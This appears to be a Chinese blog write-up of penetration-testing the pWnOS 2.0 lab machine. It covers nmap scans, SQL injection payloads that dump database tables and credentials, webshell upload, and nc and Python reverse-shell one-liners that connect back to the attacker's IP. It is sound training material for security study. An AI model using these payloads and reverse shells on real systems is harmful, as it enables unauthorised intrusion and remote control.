【学渗透靶机 ——pWnOS: 2.0】

已于 2023-06-21 13:58:27 修改
阅读量411 收藏
点赞数
分类专栏: web渗透 靶机学习 文章标签: sql web安全
于 2023-04-12 00:23:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/jieli0901227/article/details/130095512
版权
本文描述了一次针对pWnOS2.0靶机的渗透测试过程,包括使用NMAP扫描开放端口,发现80端口的Web服务和SQL注入漏洞。通过SQL注入获取数据库信息,尝试SSH登录。然后,利用Apache的web目录上传并执行webshell,尝试反弹shell,最终通过Python成功获取了系统的更高权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

学渗透靶机 ——pWnOS: 2.0

环境

攻击机:kali
靶机:pWnOS: 2.0
此靶机比较特殊,vmware靶机。靶机IP固定10.10.10.100,需要配置虚拟机NAT的IP,如下图所示,
在这里插入图片描述
攻击机KALI IP为10.10.10.128
在这里插入图片描述

信息收集

主机信息收集:

已知靶机IP为10.10.10.100,所以我们直接扫描靶机开放端口 ,扫描结果如下图:

 nmap --min-rate 10000 -p- 10.10.10.100

在这里插入图片描述
主机开放了22 、80 端口 ,扫描这两个端口详细信息,扫描结果如下图

sudo nmap -sT -sV -O -p22,80 10.10.10.100

在这里插入图片描述

web信息收集

访问80

在这里插入图片描述

发现有登录和注册界面跳转,尝试访问看看
登录:
在这里插入图片描述
测试是否有sql 注入
使用burp 抓包测试:存在报错注入 ,如下图
在这里插入图片描述
通过尝试发现报错注入点在数字4 的位置
在这里插入图片描述
收集数据库相关信息:
利用数据库字段获取数据库的库、表、字段信息
查询当前数据库中有哪些表

' union select 1,2,3,group_concat(table_name,''),5,6,7,8  from  information_schema.tables where table_schema=database() -- -

在这里插入图片描述
查询users表中有哪些字段

' union select 1,2,3,COLUMN_NAME,5,6,7,8 from  information_schema.columns where TABLE_NAME="user" -- -

在这里插入图片描述
查询uses 中的账号密码:
在这里插入图片描述
密码为:c2c4b4e51d9e23c02c15702c136c3e950ba9a4af
通过工具对字符串进行判断:
在这里插入图片描述
破解出密码如下:
在这里插入图片描述

使用这个密码尝试ssh 登录 失败

收集数据库信息获取到当前用户为root ,权限比较高,
在这里插入图片描述

可以尝试上传web shell ,上传web必须知道路径,通过端口信息收集到的80 端口是apache 的web 服务,默认情况的web 目录为/var/www 我们可以尝试先判断:
在这里插入图片描述
靶机的web目录是/var/www, 并且发现了一个配置文件,查看这个配置文件,在这里插入图片描述
发现数据库配置文件:读取该文件信息
在这里插入图片描述
发现又有个账号root \goodday 尝试ssh 登录 失败,
既然能够读取文件、那我们尝试写文件
在这里插入图片描述
出现报错信息,不用管,我们尝试访问这个webshell,访问成功如下图:
在这里插入图片描述

使用命令查看是否安装nc 或者python,发现nc、和python 环境都有
在这里插入图片描述
在这里插入图片描述

使用nc 反弹shell ,失败

nc -nv 10.10.10.128 443 -e /'bin/bash'

使用python 反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.128",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

在这里插入图片描述
成功拿到webshell

权限提升

浏览文件发现一个数据库配置文件,读取文件有root 和密码,如下图:
在这里插入图片描述
使用该账号密码登录成功
在这里插入图片描述

pWnOS: 2.0 - linux
战神/calmness的博客
12-28 710
目录 靶机地址 信息收集 Whatweb 查是否是CMS 访问80页面 IsIntS 目录遍历 PHP信息版本 搜索漏洞利用 hydra 爆破web登录页面 尝试错误 爆破:killerbeesareflying 报错注入 输入账户密码登录blog 查看源码 注入读取文件load_file into outfile 函数 命令执行 反弹shell [一] 反弹shell [二] 提权 直接登录成功 (二)查看blog源码 MSF 登录成功 上传php-rev
[VulnHub靶机渗透] pWnOS 2.0
人若无名,便可专心练剑
04-05 2082
靶机精讲之pWnOS 2.0,vulnhub靶机,简洁明快的攻击链,php+mysql架构cms渗透的样本。从利用选择、反弹shell获得,到信息搜集和枚举,以及mysql数据库的翻找,都可以算上php+mysql架构cms渗透的标准靶机,很多更复杂的渗透也是在此基础上的展开的,这台靶机是可以深入思考,形成思维框架的靶机。需要注意的是,这个靶机我们下载下来,默认是个静态的IP:10.10.10.100,所以我们需要把我们的wmvare的虚拟网卡设置为10.10.10.0/24网段的地址。
pWnOS 2.0
底层社会中的弱智
04-29 608
目标IP 10.10.10.100 需要把NAT设置改为10.0网段 开放的端口只有两个 22 版本没有可利用漏洞 可以爆破 80 apache暂无可用exp 扫描目录 网页中有两个与数据库进行数据交互的地方 注册和登录 进行sql注入测试 登陆页面存在注入 获取登陆密码 登陆后没有有用的信息 @isints:killerbeesareflying 尝试使用lo...
靶场实战之pWnOS2.0
qq_55415442的博客
07-14 228
靶场实战之pWnOS2.0
红队打靶:pWnOS2.0打靶思路详解(vulnhub)
Bossfrank的博客
06-27 1994
本文详述了vulnhub靶机pWnOS2.0的打靶全过程。靶机难度不高,但渗透的思路清晰,环环相扣。本文打靶涉及SQL注入、searchsploit漏洞利用、不安全的文件上传、敏感信息搜索等等。
Vulnhub靶机PWNOS_ 2.0 (PRE-RELEASE)
LainWith的博客
12-23 1330
pWnOS(此系列共2台)发布日期:2011年7月4日难度:中运行环境:VMware Workstation目标:取得 root 权限补充:靶机是静态IP,因此需要配置网卡为10.10.10.0主机发现端口扫描+漏洞扫描CMS漏洞利用SQL读写文件敏感信息提权。
黑客零基础第三章-Web漏洞实战-SQL注入pWnOS: 2.0
ShadowBlade
08-29 1572
第八节内容讲述了文件上传漏洞的利用原理,并在DVWA上进行简单的入侵实验。本节以实战的方式,结合vulnhub靶机pWnOS: 2.0,让大家进一步SQL注入的实际应用场景。
vulnhub pWnOS_v2.0
n1ght的博客
01-27 257
尝试着去做一些ctf题目和靶机,vulnhub的难度还是非常的友好,熟悉一下。这个靶机pWnOS_v2.0还是需要自己配置网络地址的。
pWnOS2.0 靶机渗透( cms 渗透,php+mysql 网站渗透密码碰撞)
m0_63416413的博客
10-04 1091
nmap 扫描,发现靶机开放了 22, 80 端口访问 80,结合目录爆破,发现 /blog 目录中运行了一个 cms 系统观察发现 cms 的名称和版本,是 simple php blog 0.4.0 ,尝试在 searchsploit 中找利用脚本发现利用脚本,使用脚本在 cms 中创建新账号,并成功登录发现后台的上传图片,验证可以上传 .php 文件后构造反弹 shell,成功拿到 shell拿到初始 shell 后,做信息收集。
vulnhub靶场:PWNOS: 2.0 (PRE-RELEASE)多种渗透方法
qq_60256199的博客
06-10 938
vulnhub靶场:PWNOS: 2.0 (PRE-RELEASE) 介绍多种测试方法。
PWNOSv2.0:Desarrollo del CTF PWNOSv2.0
03-06
PWNOSv2.0 Desarrollo del CTF PWNOSv2.0 下载: : 1.配置。 IP地址为10.10.10.100的虚拟虚拟环境配置。 视在实体之间的差异而进行的配置。 2.埃斯卡诺-德波多斯 root@kali:~/PWNOS# nmap -n -P0 -p- -sC -sV -O -T5 -oA full 10.10.10.100 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-04 21:36 EST Nmap scan report for 10.10.10.100 Host is up (0.00033s
Vulnhub靶机系列:pWnOS: 2.0
汗的博客
03-30 1664
文章目录靶机地址靶机设置利用知识信息收集并getshell提权 靶机地址 https://www.vulnhub.com/entry/pwnos-20-pre-release,34/ 靶机设置 靶机默认设置: IP: 10.10.10.100 Netmask: 255.255.255.0 Gateway: 10.10.10.15 所以攻击机需要在10.10.10.0/24网段 我在虚拟网络编辑器里...
【网络安全渗透测试零基础入门】之Vulnhub靶场PWNOS: 2.0 多种渗透方法,收藏这一篇就够了!
最新发布
A1353192296的博客
11-12 952
这是小强给粉丝盆友们整理的网络安全渗透测试入门阶段Vulnhub靶场实战教程。本文介绍靶机PWNOS: 2.0渗透方法,由于靶机系统比较老,尝试了几种不同的角度获得shell和提权。
pWnOS2.0靶场渗透练习&udf提权&推荐练习靶场&较经典的web渗透靶场&红队靶场
jockerboss的博客
03-12 1218
pWnOS2.0靶场练习&udf提权&推荐练习靶场&较经典的web渗透靶场&小白必练
PWNOS_ 2.0 (PRE-RELEASE)
qq_57672166的博客
01-04 682
PWNOS_ 2.0 (PRE-RELEASE)
PWNOS: 2.0 (PRE-RELEASE)
Mysmycbx的博客
03-14 224
pwnos2.0
vulnhub靶机pWnOS2.0
weixin_53665747的博客
06-13 201
偏简单,整体思路没有太难,利用过程也相对顺利。
VulnHub-PWNOS: 2.0 (PRE-RELEASE)手动复现msf POC
shulao2010的博客
06-11 232
通过一个简单靶场,手动复现msfconsole的POC
14、pWnOS_v2.0(VulnHub)
carmi的博客
04-29 354
pWnOS_v2.0 一、nmap 靶机ip找不见的自行上网查找解决办法。 二、web渗透 目录爆破 /blog/ whatweb /search.php /register.php qwe 123qwe 点击给定的链接 兔子洞,无法登入?一直卡在这个界面 wfuzz 貌似没什么用 nmap -> 目录 Simple PHP Blog 0.4.0 perl ...
vulnhub靶机——raven: 2
09-03
- *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值